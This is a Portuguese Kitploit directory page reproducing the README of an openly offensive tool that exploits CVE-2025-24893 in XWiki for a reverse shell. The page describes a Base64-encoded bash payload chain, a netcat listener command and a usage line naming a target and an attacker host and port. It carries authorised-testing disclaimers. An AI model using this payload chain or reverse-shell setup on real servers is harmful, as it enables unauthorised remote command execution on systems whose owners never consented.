Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 exploit RCE para XWiki com capacidade de shell reverso | Kitploit
Ferramentas/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 exploit RCE para XWiki com capacidade de shell reverso

Ver Repositório
36há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de Reverse Shell para CVE-2025-24893 no XWiki

Aviso: Este script é destinado apenas para fins educacionais e testes de segurança autorizados. Não o utilize em sistemas que você não possua ou para os quais não tenha permissão explícita para testar. O uso indevido pode ser ilegal e perigoso.

Descrição

Este script Python explora a CVE-2025-24893, uma vulnerabilidade de Execução Remota de Código que afeta versões do XWiki até 15.10.10.

  • Versão Testada: XWiki 15.10.8
  • Impacto: Permite a execução de comandos arbitrários no servidor alvo.
  • Versão do Python: Escrito e testado em Python 3

Esta versão estende o PoC original de Al Baradi Joy para gerar um reverse shell. O PoC original pode ser encontrado aqui.

Como Funciona

  • O XWiki executa código Groovy através do parâmetro da URL.

  • O exploit injeta um comando bash -c neste template Groovy.

  • Um reverse shell normal contém várias aspas (' e ) que e a URL.

"
quebrariam a avaliação do Groovy
  • Para resolver isso, o script codifica o comando shell de uma linha em Base64.

  • O payload é então enviado na URL e executado usando a seguinte cadeia:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Isso decodifica o payload Base64 com segurança e o executa com bash -i, fornecendo um reverse shell interativo.

  • Formato da URL Alvo

    • Formato: http://<host-alvo>
    • NÃO inclua:
      • Uma barra final / no final
      • O caminho /xwiki (o script o acrescenta automaticamente)

    Exemplos:

    root@kitploit:~
    # Correto
    http://10.129.95.114:8080
    http://example.com:8080
    
    # Incorreto
    http://10.129.95.114:8080/         # barra final
    http://example.com/xwiki            # inclui /xwiki
    

    Configuração do Listener

    Antes de executar o exploit, você deve iniciar um listener em sua máquina para capturar o reverse shell.

    Exemplo usando Netcat:

    root@kitploit:~
    nc -lvnp <lport>
    
    • <lport> deve corresponder à porta que você fornece como argumento para o script.

    Uso

    root@kitploit:~
    python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
    

    Exemplo:

    root@kitploit:~
    python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
    
    • O script exibe a URL completa do exploit, o payload Base64 e instruções para verificar seu listener.

    Referências

    • GHSA Advisory
    • XWiki Homepage
    • PoC original por Al Baradi Joy

    Créditos

    • Prova de Conceito Original: Al Baradi Joy
    • Esta versão: Atualizada para gerar um reverse shell para execução interativa de comandos

    Aviso

    • Use este exploit apenas em ambientes controlados (HTB, máquinas de laboratório, VMs que você possui).
    • O uso não autorizado em servidores públicos é ilegal e pode resultar em acusações criminais.
    Baixar ferramenta